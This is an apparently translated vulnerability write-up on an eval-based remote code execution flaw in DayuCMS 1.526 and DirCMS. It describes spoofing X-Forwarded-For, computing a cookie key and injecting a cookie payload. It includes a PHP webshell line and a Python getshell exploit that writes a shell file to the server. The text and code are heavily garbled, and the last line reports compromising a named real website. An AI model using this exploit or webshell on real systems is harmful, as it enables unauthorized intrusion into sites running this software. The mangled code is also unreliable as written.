DayuCMS 1.526 and DirCMS frontend arbitrary code execution analysis and POC

DayuCMS 1.526 and DirCMS frontend arbitrary code execution analysis and POC
DayuCMS directly uses eval in functions that convert strings into arrays and has controllable variables, resulting in arbitrary code execution.
DayuCMS may refer to the DirCMS code. The two CMS codes are almost similar. This article only analyzes DayuCMS
0x01. Vulnerability description DayuCMS directly uses eval in functions that convert strings into arrays and has controllable variables, resulting in arbitrary code execution.

Affected Versions:

All DayuCMS versions (Latest Version 1.526 and below)

All versions of DirCMS (no updates available) 0x02. vulnerability details

/Pay/order. php

$payobj=new pay();$action=isset($action)?$action:'step1';session_start();$cookiekey=dayucms_md5('productarray'.IP);$productarray=string2array(get_cookie($cookiekey));

The IP in the above Code is declared in include/common. inc. php

define('IP',getIp()); 

Include/global. func. php

// Obtain the ip address function getIp () {$ IP = 'unknown ip'; if (! Empty ($ _ SERVER ['HTTP _ CLIENT_IP ']) {return is_ip ($ _ SERVER ['HTTP _ CLIENT_IP'])? $ _ SERVER ['HTTP _ CLIENT_IP ']: $ ip;} elseif (! Empty ($ _ SERVER ['HTTP _ X_FORWARDED_FOR ']) {return is_ip ($ _ SERVER ['HTTP _ X_FORWARDED_FOR'])? $ _ SERVER ['HTTP _ X_FORWARDED_FOR ']: $ ip;} else {return is_ip ($ _ SERVER ['remote _ ADDR'])? $ _ SERVER ['remote _ ADDR ']: $ ip ;}}

Ip addresses can be forged using X-Forwarded-.

Include/common. inc. php

Function dayucms_md5 ($ str) {return substr (md5 ($ str), 8, 16);} // convert a string to an Array function string2array ($ str) {if (disablefunc ('eval') exit ('function eval is disabled and may not work properly! '); If ($ str = '') return array (); if (is_array ($ str) return $ str; // returns @ eval ("\ $ array = $ str;"); return $ array;} function get_cookie ($ var) {$ var = COOKIE_PRE. $ var; return isset ($ _ COOKIE [$ var])? $ _ COOKIE [$ var]: false ;}

The normal usage of the string2array function is:

$ Tmp = 'array ("hello" => "world") '; $ arr = string2array ($ tmp); var_dump ($ arr ); // $ arr is an array.

However, if the string2array function parameter $ str is1;echo 222Because eval can execute multiple statements separated by semicolons, the Code becomes@eval("\$array = 1;echo 222;");Cause code execution.

It can be found that many cms have functions such as string2array. For example, Lines 237 in phpcms v9/phpcms/libs/functions/global. func. php.

function string2array($data) {    if($data == '') return array();    eval("\$array = $data;");    return $array;}

Data/config. inc. php

In the get_cookie function, the COOKIE_PRE macro must be described.

Define ('cookie _ pre', 'rnsg2zrbzn '); // COOKIE prefix. When multiple sets of Dircms are installed under the same domain name, modify the Cookie prefix.

In Dayucms code, Dircms is displayed, so you understand Orz ..

For the first installation, the COOKIE_PRE value is fixed to TEVqv2KtR5, which will change randomly in future installation.

Obviously, based on the above code, we can know that this is an arbitrary code execution.

However, to ensure that the POC can be used in any environment, you need to forge a fixed ip address, so 2.2.2.2.

Return to order. php and set $ cookiekey to 060b8081c32887f8. Then, connect the value to COOKIE_PRE and use it as the key of the new cookie.

0x03. Vulnerability Exploitation

First, access pay/order. php and obtain COOKIE_PRE as rNsg2Zrbzn, excluding siteid.

Then, use Modify Headers to Modify XFF to 2.2.2.2.

The ip address 2.2.2.2 has been used to calculate that $ cookiekey is 060b8081c32887f8. Therefore, set the key of the new cookie to rNsg2Zrbzn060b8081c32887f8, so that when you access pay/order again. in php, get_cookie no longer returns flase, And the string2array function can be called and run the code we constructed.

Create a cookie with the content

<?phpassert($_POST[x]);?>

Access pay/order. php again to execute code and generate shell

Currently, the dayucms Official Website still supports getshell.

0x03. POC

# Coding: utf-8import requestsimport sysimport hashlibimport urllib _ Author _ = 'joychou' _ Date _ = 'May 27, 2015 19:13:48 'def is_url_getshell (url ): order = url [-13:] if order! = 'Pay/order. php ': print' The url can not getshell... 'sys. exit () def printinfo (): print '''#################################### ##################### Dayucms or dircms Getshell EXP ## Version: dayucms <= 1.526 and all dircms # Blog: www.joychou.org ####################################### ################### Usage: exp. py url Example: exp. py http://www.dayucms.com/pay/order.php '''Def md5 (str): return hashlib. md5 (str). hexdigest () def dayucms_md5 (str): return md5 (str) [8: 24] # param: http://victim.com/upload/test.php # Return: http://victim.com/upload/def Spilit_url (url): m = 0 for I in url [:-1]: # reverse url m + = 1 if I = '/': break url_spilit = url [: -(m-1)] return url_spilitdef main (url): ip = '2. 2.2.2 'try: r = requests. get (url) failed t Exception, e: print e sys. exit () cookie = r. cookies # get cookie_pre from cookie of client request for cookie_tuple in cookie. items (): # cookie. items () return a tuple for key in cookie_tuple: if 'siteid' in key: co Okie_pre = key break; cookiekey = dayucms_md5 ('productarray' + ip) cookiekey = cookie_pre [:-6] + cookiekey print 'x-Forwarded-For is: % s' % ip print 'cookiekey which need to add is: % s' % cookiekey print ''false_headers = {'x-Forwarded-': ip} # % 3b is the urlencode of; #; must be replaced by $ 3b. because in cookies,; means that one cookie is over # shell password is x shell = '1% 3 bfputs (fopen (Base64_decode (c21pbGVudC5waHA), w), base64_decode (response) 'false_cookies = {cookiekey: shell, cookie_pre: '1'} r = requests. get (url, cookies = false_cookies, headers = false_headers) url_shell = spilit_url (url) + 'smilent. php 'r = requests. get (url_shell) if r. status_code = 200: print 'getshell success! 'Print 'Shell url is % s' % url_shell else: print 'getshell fail... 'If _ name _ = '_ main _': printinfo () if len (sys. argv )! = 2: print 'input error' sys. exit () is_url_getshell (sys. argv [1]) main (sys. argv [1])

Baidu powered by dircms test dircms, found the target http://www.sywbs.com.cn/pay/order.php, getshellsuccessful